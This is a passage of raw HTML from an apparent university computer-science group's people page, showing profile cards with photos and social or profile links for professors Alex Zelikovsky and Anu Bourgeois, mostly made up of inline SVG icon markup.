983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 